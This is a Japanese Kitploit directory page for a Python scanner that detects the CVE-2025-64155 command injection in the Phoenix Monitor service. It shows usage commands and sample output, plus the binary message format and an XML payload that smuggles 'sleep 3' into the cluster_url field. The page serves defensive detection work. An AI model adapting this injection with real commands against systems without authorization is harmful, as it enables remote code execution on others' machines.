Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-64155-hunter — CVE-2025-64155-hunter | Kitploit
ツール/GitHubGitHub/purehate/cve-2025-64155-hunter
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubpurehate/cve-2025-64155-hunter

CVE-2025-64155-hunter

CVE-2025-64155-hunter

リポジトリを見る
126ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-64155 スキャナ

Phoenix Monitor サービスにおけるコマンドインジェクションの脆弱性(CVE-2025-64155)を検出するための Python スキャナです。

説明

CVE-2025-64155 は、Phoenix Monitor サービスのコマンドインジェクションの脆弱性であり、handleStorageRequest コマンド(コマンド ID: 1075724911)の cluster_url パラメータを通じてリモートコード実行を可能にします。

この脆弱性は、cluster_url フィールドのユーザー制御入力が適切なサニタイズなしにシェルコマンドに渡される際に発生し、シェルのメタ文字によるコマンドインジェクションを許容します。

このスキャナは、Horizon3AI によるエクスプロイト研究に基づいています。

特徴

  • 時間ベースの検出: 安全で非破壊的な時間ベースの検出方法を使用
  • SSL/TLS サポート: 証明書検証のバイパスを伴う SSL 接続を処理
  • 詳細モード: デバッグ用の詳細な出力
  • サービスチェック: 脆弱性をテストせずにサービスにアクセスできるか確認するオプション

要件

  • Python 3.6+
  • 標準ライブラリのみ(外部依存なし)

使用方法

基本スキャン

root@kitploit:~
python3 scanner.py -t <target_ip>

詳細オプション

root@kitploit:~
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900

# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v

# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15

# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only

コマンドライン引数

  • -t, --target: ターゲットの IP アドレスまたはホスト名(必須)
  • -p, --port: Phoenix Monitor サービスのポート(デフォルト: 7900)
  • --timeout: 接続タイムアウト(秒)(デフォルト: 10)
  • -v, --verbose: 詳細出力を有効にする
  • --check-only: サービスにアクセスできるかのみ確認する

仕組み

スキャナは時間ベースの検出方法を使用します:

  1. SSL/TLS 経由で Phoenix Monitor サービスに接続します
  2. cluster_url フィールドに sleep 3 を含む悪意のあるペイロードを handleStorageRequest コマンドで送信します
  3. 応答時間を測定します
  4. 応答が約 3 秒遅延した場合、ターゲットは脆弱である可能性が高いです(コマンドが実行されました)

この方法は安全で非破壊的です。有害なコマンドを実行せず、検出目的で無害な sleep コマンドのみを実行します。

出力例

脆弱なターゲット

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds

============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)

脆弱でないターゲット

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds

============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable

技術詳細

メッセージ形式

スキャナは以下の構造のバイナリメッセージを送信します:

root@kitploit:~
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload

ペイロード構造

XML ペイロードには、cluster_url フィールドにコマンドインジェクションが含まれています:

root@kitploit:~
<TEST_STORAGE type="elastic">
    <cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
    ...
</TEST_STORAGE>

免責事項

このツールは、許可されたセキュリティテストおよび研究目的のみで使用してください。このツールは、自分が所有するシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。コンピュータシステムへの不正アクセスは違法です。

ライセンス

MIT ライセンス - 詳細は LICENSE ファイルを参照してください。

ツールをダウンロード